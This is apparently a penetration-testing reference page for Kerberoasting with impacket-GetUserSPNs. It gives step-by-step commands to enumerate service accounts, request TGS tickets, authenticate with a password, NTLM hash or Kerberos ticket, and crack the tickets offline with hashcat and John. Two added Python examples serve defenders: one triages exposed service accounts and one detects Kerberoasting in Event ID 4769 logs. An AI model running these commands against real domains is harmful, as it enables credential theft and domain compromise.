Overview

impacket-GetUserSPNs performs Kerberoasting by enumerating user accounts with Service Principal Names (SPNs) and requesting their TGS tickets. These tickets are encrypted with the service account’s password hash and can be cracked offline.
impacket-GetUserSPNs <DOMAIN>/<USER>:<PASSWORD> -dc-ip <DC_IP> [options]

Authentication

With Password

impacket-GetUserSPNs domain.local/jdoe:'Password123' -dc-ip 10.10.10.1

With NTLM Hash

impacket-GetUserSPNs domain.local/jdoe -hashes :a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4 -dc-ip 10.10.10.1

With Kerberos

export KRB5CCNAME=$(pwd)/jdoe.ccache
impacket-GetUserSPNs domain.local/jdoe -k -no-pass -dc-host dc01.domain.local
When using -k, provide -dc-host with the FQDN instead of -dc-ip.

Enumerate SPN Accounts

List all user accounts that have SPNs set (without requesting tickets):
impacket-GetUserSPNs domain.local/jdoe:'Password123' -dc-ip 10.10.10.1
Output shows the SPN, the account name, its group membership, and when its password was last set (newer impacket versions also print last-logon and delegation columns):
ServicePrincipalName    Name       MemberOf                              PasswordLastSet
----------------------  ---------  ------------------------------------  -------------------
mssql/sql01.domain.local  svc_sql   CN=Domain Admins,CN=Users,DC=domain   2024-01-15 10:23:45
http/web01.domain.local   svc_web   CN=Service Accounts,OU=Groups,DC=dom  2023-08-20 14:12:33
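The table above is also the defender's remediation list: the accounts that are privileged or have not rotated their password in years are the ones a cracked ticket turns into a domain compromise. The following is an added example (not impacket's own code) that parses the table, reading column boundaries from the dashed separator line so extra columns are tolerated, and flags those accounts. The sample output, the privileged-group list and the one-year age threshold are constructed for the example.

```python
"""Defender-side triage of GetUserSPNs enumeration output.

Added example (not part of impacket): parses the table the tool prints
(columns are read from the '----' separator line, so extra columns such
as LastLogon/Delegation are handled too) and flags the SPN accounts that
would be cracked first: members of privileged groups and accounts whose
password has not been rotated for a long time.
"""
import re
from datetime import datetime, timedelta

# Constructed sample, shaped like the tool's table above (not real output).
SAMPLE_OUTPUT = """\
ServicePrincipalName      Name      MemberOf                              PasswordLastSet
------------------------  --------  ------------------------------------  -------------------
mssql/sql01.domain.local  svc_sql   CN=Domain Admins,CN=Users,DC=domain   2024-01-15 10:23:45
http/web01.domain.local   svc_web   CN=Service Accounts,OU=Groups,DC=dom  2023-08-20 14:12:33
cifs/fs01.domain.local    svc_file  CN=Service Accounts,OU=Groups,DC=dom  2024-11-02 08:00:00
"""

# Groups whose membership makes a crackable service account a domain-wide risk
# (assumed list for the example; extend with your own tier-0 groups).
PRIVILEGED_GROUPS = ("domain admins", "enterprise admins", "administrators",
                     "account operators", "schema admins")
MAX_PASSWORD_AGE = timedelta(days=365)


def parse_table(text):
    """Turn the tool's fixed-width table into a list of dicts keyed by header name."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    header, separator, rows = lines[0], lines[1], lines[2:]
    # Column spans come from the runs of dashes in the separator line.
    spans = [(m.start(), m.end()) for m in re.finditer(r"-+", separator)]
    names = [header[s:e].strip() for s, e in spans]
    records = []
    for row in rows:
        rec = {}
        for i, ((s, e), name) in enumerate(zip(spans, names)):
            # The last column runs to end of line (its dashes may be shorter than the value).
            rec[name] = (row[s:] if i == len(spans) - 1 else row[s:e]).strip()
        records.append(rec)
    return records


def triage(text, now=None, max_age=MAX_PASSWORD_AGE):
    """Return findings for accounts worth rotating or moving to a gMSA first.

    `now` is an optional 'YYYY-MM-DD HH:MM:SS' string so results are
    reproducible; it defaults to the current time.
    """
    ref = datetime.strptime(now, "%Y-%m-%d %H:%M:%S") if now else datetime.now()
    findings = []
    for rec in parse_table(text):
        reasons = []
        member_of = rec.get("MemberOf", "")
        if any(group in member_of.lower() for group in PRIVILEGED_GROUPS):
            reasons.append("privileged group: " + member_of)
        pls = rec.get("PasswordLastSet", "")
        if pls in ("", "<never>"):
            reasons.append("password never set")
        else:
            age = ref - datetime.strptime(pls, "%Y-%m-%d %H:%M:%S")
            if age > max_age:
                reasons.append(f"password age {age.days} days")
        if reasons:
            findings.append({"account": rec["Name"],
                             "spn": rec["ServicePrincipalName"],
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_OUTPUT):
        print(f["account"], f["spn"], "; ".join(f["reasons"]))
```

Run it against a saved enumeration and the accounts it prints are the ones to move to group-managed service accounts or long random passwords first; an account in Domain Admins with an SPN should not exist at all.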

Request TGS Tickets

Request All

impacket-GetUserSPNs domain.local/jdoe:'Password123' -dc-ip 10.10.10.1 -request

Request for Specific User

impacket-GetUserSPNs domain.local/jdoe:'Password123' -dc-ip 10.10.10.1 -request-user svc_sql

Output Format for Cracking

Save to File

impacket-GetUserSPNs domain.local/jdoe:'Password123' -dc-ip 10.10.10.1 -request -outputfile kerberoast.txt

Request Specific User and Save

impacket-GetUserSPNs domain.local/jdoe:'Password123' -dc-ip 10.10.10.1 -request-user svc_sql -outputfile svc_sql.txt
The output format is ready for hashcat by default ($krb5tgs$23$*...).

Cracking with Hashcat and John

Hashcat

RC4 (most common):
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt
AES256 (etype 17/18):
hashcat -m 19700 kerberoast.txt /usr/share/wordlists/rockyou.txt
Hash Mode  Encryption Type
13100      Kerberos 5 TGS-REP etype 23 (RC4)
19600      Kerberos 5 TGS-REP etype 17 (AES128)
19700      Kerberos 5 TGS-REP etype 18 (AES256)
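On the defending side the same etype distinction is the detection handle: a Kerberoast run shows up in domain controller Security logs as one principal requesting service tickets (Event ID 4769) for many distinct user-account SPNs within seconds, typically with etype 0x17 (RC4), which is what the tool asks for by default. The following is an added example, not from the page or impacket, that runs that logic over a handful of constructed 4769 records; the five-minute window and the three-service threshold are assumptions to tune for your environment.

```python
"""Kerberoasting detection over Windows Security Event ID 4769 records.

Added example, not from the page or impacket. A Kerberoast run looks like one
principal requesting service tickets for many distinct SPN-backed accounts in
seconds; GetUserSPNs asks for RC4 (etype 0x17) by default, so RC4 requests are
reported separately and stand out in domains that otherwise use AES only.
The 4769 fields used are TargetUserName (requester), ServiceName,
TicketEncryptionType and IpAddress.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed 4769 events for the example (not real telemetry).
SAMPLE_4769 = [
    # One account pulling tickets for four service accounts in three seconds.
    {"ts": "2024-03-01T09:00:01", "user": "jdoe@DOMAIN.LOCAL", "service": "svc_sql", "etype": "0x17", "ip": "10.10.10.50"},
    {"ts": "2024-03-01T09:00:02", "user": "jdoe@DOMAIN.LOCAL", "service": "svc_web", "etype": "0x17", "ip": "10.10.10.50"},
    {"ts": "2024-03-01T09:00:02", "user": "jdoe@DOMAIN.LOCAL", "service": "svc_backup", "etype": "0x17", "ip": "10.10.10.50"},
    {"ts": "2024-03-01T09:00:03", "user": "jdoe@DOMAIN.LOCAL", "service": "svc_ldap", "etype": "0x17", "ip": "10.10.10.50"},
    {"ts": "2024-03-01T09:00:03", "user": "jdoe@DOMAIN.LOCAL", "service": "DC01$", "etype": "0x12", "ip": "10.10.10.50"},
    # Normal: a user touching two services with AES, half an hour apart.
    {"ts": "2024-03-01T09:05:00", "user": "asmith@DOMAIN.LOCAL", "service": "svc_web", "etype": "0x12", "ip": "10.10.10.51"},
    {"ts": "2024-03-01T09:30:00", "user": "asmith@DOMAIN.LOCAL", "service": "svc_sql", "etype": "0x12", "ip": "10.10.10.51"},
    # Machine-account noise that must not trigger.
    {"ts": "2024-03-01T09:06:00", "user": "WS01$@DOMAIN.LOCAL", "service": "krbtgt", "etype": "0x12", "ip": "10.10.10.52"},
]

RC4_ETYPE = "0x17"               # etype 23, the hashcat 13100 format
WINDOW = timedelta(minutes=5)    # assumed tuning value
DISTINCT_SERVICE_THRESHOLD = 3   # assumed tuning value


def is_noise(service: str) -> bool:
    # Machine accounts (trailing $) and krbtgt are not Kerberoast targets:
    # the tool enumerates user accounts with SPNs, so ignore those tickets.
    return service.endswith("$") or service.lower() == "krbtgt"


def detect_kerberoasting(events, window=WINDOW, threshold=DISTINCT_SERVICE_THRESHOLD):
    """Return one alert per requester whose distinct non-noise service requests
    within any `window` reach `threshold`; the widest such window is reported."""
    by_user = defaultdict(list)
    for ev in events:
        if is_noise(ev["service"]):
            continue
        by_user[ev["user"]].append((datetime.fromisoformat(ev["ts"]), ev))
    alerts = []
    for user, items in by_user.items():
        items.sort(key=lambda x: x[0])
        start, best = 0, {}
        for end in range(len(items)):
            # Slide the window start forward until the span fits.
            while items[end][0] - items[start][0] > window:
                start += 1
            in_window = [e for _, e in items[start:end + 1]]
            services = {e["service"] for e in in_window}
            if len(services) >= threshold and len(services) > len(best.get("services", ())):
                best = {
                    "user": user,
                    "services": sorted(services),
                    "rc4_services": sorted({e["service"] for e in in_window if e["etype"] == RC4_ETYPE}),
                    "source_ips": sorted({e["ip"] for e in in_window}),
                    "window_start": items[start][0].isoformat(),
                }
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for alert in detect_kerberoasting(SAMPLE_4769):
        print(alert["user"], "from", ",".join(alert["source_ips"]),
              "requested", len(alert["services"]), "service tickets;",
              "RC4:", ",".join(alert["rc4_services"]))
```

Two caveats when moving this to real logs: 4769 volume is high, so pre-filter on Status 0x0 and on ServiceName values that are user accounts with SPNs (the same list the enumeration above produces), and if the domain enforces AES for service accounts, any 0x17 request at all is worth an alert regardless of count.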

John the Ripper

john kerberoast.txt --wordlist=/usr/share/wordlists/rockyou.txt

Kerberos Authentication

Use an existing TGT to Kerberoast without sending NTLM traffic:
# Get a TGT first
impacket-getTGT domain.local/jdoe:'Password123' -dc-ip 10.10.10.1
export KRB5CCNAME=$(pwd)/jdoe.ccache

# Kerberoast using Kerberos auth
impacket-GetUserSPNs domain.local/jdoe -k -no-pass -dc-host dc01.domain.local -request -outputfile kerberoast.txt

No Preauth Enumeration

Accounts with Kerberos pre-authentication disabled can have their AS-REP hashes requested without credentials; that is a different attack, and impacket-GetNPUsers is the tool for it. GetUserSPNs itself needs valid credentials, but the two overlap when an account both has an SPN and has preauth disabled, so enumerate with GetUserSPNs first and then request tickets for the specific accounts of interest:
# First enumerate with GetUserSPNs, then target specific accounts
impacket-GetUserSPNs domain.local/jdoe:'Password123' -dc-ip 10.10.10.1 -request

Quick Reference

# Enumerate SPN accounts
impacket-GetUserSPNs domain.local/jdoe:'Pass' -dc-ip 10.10.10.1

# Request all TGS tickets
impacket-GetUserSPNs domain.local/jdoe:'Pass' -dc-ip 10.10.10.1 -request

# Request specific user
impacket-GetUserSPNs domain.local/jdoe:'Pass' -dc-ip 10.10.10.1 -request-user svc_sql

# Save to file
impacket-GetUserSPNs domain.local/jdoe:'Pass' -dc-ip 10.10.10.1 -request -outputfile hashes.txt

# With hash
impacket-GetUserSPNs domain.local/jdoe -hashes :NTHASH -dc-ip 10.10.10.1 -request

# With Kerberos
export KRB5CCNAME=$(pwd)/jdoe.ccache
impacket-GetUserSPNs domain.local/jdoe -k -no-pass -dc-host dc01.domain.local -request

# Crack with hashcat (RC4)
hashcat -m 13100 hashes.txt rockyou.txt

# Crack with hashcat (AES256)
hashcat -m 19700 hashes.txt rockyou.txt

Flag                    Description
-request                Request TGS tickets for all SPN accounts
-request-user USER      Request TGS for a specific user
-outputfile FILE        Save tickets to file
-hashes LMHASH:NTHASH   Authenticate with NTLM hash
-aesKey KEY             Authenticate with AES key
-dc-ip IP               Domain controller IP address
-dc-host HOST           Domain controller hostname (for Kerberos auth)
-k                      Use Kerberos authentication
-no-pass                Don’t ask for password
-usersfile FILE         File with target usernames (one per line)